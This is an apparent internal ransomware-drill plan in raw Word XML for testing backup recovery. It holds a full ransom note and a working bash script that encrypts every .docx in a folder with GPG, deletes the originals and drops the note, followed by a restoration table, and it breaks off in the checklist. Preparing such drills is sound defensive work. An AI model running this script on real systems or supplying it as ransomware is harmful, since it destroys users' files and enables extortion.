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Security Evaluation Task: Backup Recovery Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Document Reference:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SEC-EVAL-2025-0042</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_DATE}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Prepared by:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_NAME}, Security Operations Analyst</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> INTERNAL — FOR EVALUATION PURPOSES ONLY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This document outlines a controlled security evaluation exercise designed to test the organization's backup recovery procedures and incident response capabilities. The scenario simulates a ransomware attack where an adversary has encrypted all Microsoft Word documents (.docx) located in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> directory using GPG symmetric encryption, and subsequently placed a ransom note on the user's Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The primary goal is to assess the effectiveness, speed, and completeness of our backup restoration process. Secondary objectives include evaluating user awareness, communication protocols, and the ability to distinguish between a real attack and a simulated drill.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Simulated Attack Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.1 Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The simulated attacker gains initial access via a phishing email containing a malicious attachment. After establishing a foothold, the attacker executes a script that performs the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Scans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> for all files with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> extension. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Encrypts each file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>GPG symmetric encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> with a strong passphrase (AES256). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Removes the original unencrypted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Creates a ransom note named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>RECOVERY_INSTRUCTIONS.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> on the Desktop. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.2 Ransom Note Content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:color w:val="721C24"/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="DC3545"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:color w:val="721C24"/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="DC3545"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t>SIMULATED RANSOM NOTE — DO NOT PAY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="721C24"/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="DC3545"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">The following is the exact text that will appear in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="721C24"/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="DC3545"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t>RECOVERY_INSTRUCTIONS.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="721C24"/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="DC3545"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:start="180" w:end="180" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="2D2D2D" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="2D2D2D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">=== URGENT: YOUR FILES ARE ENCRYPTED === All .docx files in /home/user/Documents have been encrypted with GPG (AES256). To recover your files, you must send exactly 0.5 Bitcoin (BTC) to the following wallet address: bc1q{PLACEHOLDER_BTC_ADDRESS} After payment, send your unique machine ID (displayed below) to {PLACEHOLDER_EMAIL} with subject "DECRYPT_KEY_REQUEST". Your machine ID: {PLACEHOLDER_MACHINE_ID} You will receive the decryption passphrase and a recovery script within 24 hours. DO NOT attempt to brute-force the passphrase. DO NOT contact law enforcement. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Bash Script for Encryption Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following script will be used by the evaluation team to simulate the encryption phase. This script must be executed in a controlled, isolated environment on the test target machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:start="180" w:end="180" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="2D2D2D" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="2D2D2D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash # SECURITY EVALUATION SCRIPT — DO NOT USE ON PRODUCTION SYSTEMS # Encrypts all .docx files in /home/user/Documents using GPG symmetric encryption TARGET_DIR="/home/user/Documents" RANSOM_NOTE="$HOME/Desktop/RECOVERY_INSTRUCTIONS.txt" PASSPHRASE="EVAL-TEST-{PLACEHOLDER_PASSPHRASE}" echo "[*] Starting encryption simulation..." echo "[*] Target directory: $TARGET_DIR" # Check if gpg is installed if ! command -v gpg &amp;&gt; /dev/null; then echo "[!] Error: gpg is not installed. Aborting." exit 1 fi # Find and encrypt all .docx files find "$TARGET_DIR" -maxdepth 1 -name "*.docx" -type f | while read -r file; do echo "[+] Encrypting: $file" gpg --batch --yes --passphrase "$PASSPHRASE" \ --cipher-algo AES256 \ --symmetric --output "${file}.gpg" "$file" if [ $? -eq 0 ]; then echo "[+] Successfully encrypted: $file" rm -f "$file" echo "[+] Original file removed: $file" else echo "[!] Failed to encrypt: $file" fi done # Write ransom note cat &gt; "$RANSOM_NOTE" &lt;&lt; 'EOF' === URGENT: YOUR FILES ARE ENCRYPTED === All .docx files in /home/user/Documents have been encrypted with GPG (AES256). To recover your files, you must send exactly 0.5 Bitcoin (BTC) to the following wallet address: bc1q{PLACEHOLDER_BTC_ADDRESS} After payment, send your unique machine ID (displayed below) to {PLACEHOLDER_EMAIL} with subject "DECRYPT_KEY_REQUEST". Your machine ID: {PLACEHOLDER_MACHINE_ID} You will receive the decryption passphrase and a recovery script within 24 hours. DO NOT attempt to brute-force the passphrase. DO NOT contact law enforcement. EOF echo "[*] Ransom note written to: $RANSOM_NOTE" echo "[*] Simulation complete. All .docx files encrypted." </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Recovery Procedure (To Be Tested)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following steps outline the expected recovery workflow for the evaluation participant:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8058" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2011"/>
        <w:gridCol w:w="2656"/>
        <w:gridCol w:w="3391"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Identify the incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>User reports inability to open .docx files. Ransom note discovered on Desktop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Isolate the machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Disconnect from network. Do not power off — preserve evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Verify backup availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Check </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/backup/daily</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> or network share </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>\\backupsrv\userdata</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> for recent copies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Restore from backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Copy the most recent backup of the Documents folder to a clean location.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Verify integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Open restored .docx files and confirm content is intact and unmodified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Document findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3391" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Complete the evaluation checklist (see Section 5).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:i/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> Under no circumstances should the simulated ransom be paid. The decryption passphrase for this evaluation is known and stored in the evaluation team's secure vault. If the participant attempts to decrypt files instead of restoring from backup, they must contact the evaluation coordinator to receive the passphrase. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Evaluation Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following items must be assessed and documented by the participant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Detection time:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> How long between encryption and user reporting the issue? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
